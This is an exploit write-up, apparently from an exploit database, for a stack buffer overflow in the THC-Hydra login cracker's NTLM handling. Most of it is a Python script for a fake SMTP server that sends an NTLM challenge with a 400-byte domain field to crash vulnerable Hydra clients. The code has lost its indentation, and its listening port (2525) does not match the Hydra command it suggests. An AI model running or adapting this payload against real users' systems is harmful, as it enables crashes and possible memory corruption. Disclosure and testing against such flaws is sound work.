# Exploit Title: Hydra - Stack Buffer Overflow
# CVE: CVE-2026-56766
# Date: 2026-06-26
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://github.com/vanhauser-thc/thc-hydra
# Software Link: https://github.com/vanhauser-thc/thc-hydra
# Affected: Hydra <= 9.7
# Tested on: Hydra 9.5 (Ubuntu 22.04)
# Category: Remote
# Platform: Linux
# Exploit Type: Stack Buffer Overflow
# CVSS: 7.5
# Description: Malicious NTLM Type-2 challenge with excessively long domain
# causes stack buffer overflow in Hydra's NTLM authentication handler
# (SMTP, POP3, IMAP, etc. modules).
# Fixed in: https://github.com/vanhauser-thc/thc-hydra/commit/9cc84c20e75f5fef6bb1790bb9ada2afad2204e2
# Usage:
# python3 exploit.py
#
# Examples:
# python3 exploit.py
#
# Notes:
# • Run this PoC server first, then launch vulnerable Hydra against it.
# • Triggers SIGSEGV in vulnerable versions.
#
# How to Use
#
# Step 1: Run the exploit server: python3 exploit.py
# Step 2: Run Hydra: hydra -l test -p test 127.0.0.1 smtp
def banner():
print(r"""
╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝
║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗
║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
╔═╗ Banyamer Security ╔═╗
""")
import socket
import base64
import struct
import threading
import time
import sys
NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLM_TYPE_2 = 2
def create_ntlm_type2_challenge():
challenge = bytearray(NTLMSSP_SIGNATURE)
challenge += struct.pack("<I", NTLM_TYPE_2)
domain_name = b"A" * 400
domain_len = len(domain_name)
flags = 0x00008201
server_challenge = b"\x11\x22\x33\x44\x55\x66\x77\x88"
reserved = b"\x00" * 8
target_name_offset = 48
challenge += struct.pack("<HHI", domain_len, domain_len, target_name_offset)
challenge += struct.pack("<I", flags)
challenge += server_challenge
challenge += reserved
challenge += b"\x00" * 8
challenge += domain_name
return challenge
class SMTPServer:
def __init__(self, host='0.0.0.0', port=2525):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
def handle_client(self, client, addr):
client.send(b"220 poc-smtp-server ESMTP Ready\r\n")
while True:
try:
data = client.recv(4096).decode('utf-8', errors='ignore').strip()
if not data:
break
if data.upper().startswith("EHLO") or data.upper().startswith("HELO"):
client.send(b"250-OK\r\n250 AUTH NTLM\r\n")
elif data.upper().startswith("AUTH NTLM"):
client.send(b"334 NTLM\r\n")
elif len(data) > 10:
type2 = create_ntlm_type2_challenge()
b64_type2 = base64.b64encode(type2).decode('ascii')
client.send(f"334 {b64_type2}\r\n".encode())
time.sleep(1)
client.recv(8192)
client.send(b"235 Authentication successful (fake)\r\n")
break
elif data.upper().startswith("QUIT"):
client.send(b"221 Bye\r\n")
break
except:
break
client.close()
def start(self):
self.sock.bind((self.host, self.port))
self.sock.listen(5)
print(f"[+] Malicious SMTP server listening on {self.host}:{self.port}")
print("[+] Run: hydra -l test -p test 127.0.0.1 smtp")
while True:
client, addr = self.sock.accept()
threading.Thread(target=self.handle_client, args=(client, addr), daemon=True).start()
if __name__ == "__main__":
banner()
try:
server = SMTPServer()
server.start()
except KeyboardInterrupt:
print("\n[+] Server stopped")
except Exception as e:
print(f"[-] Error: {e}")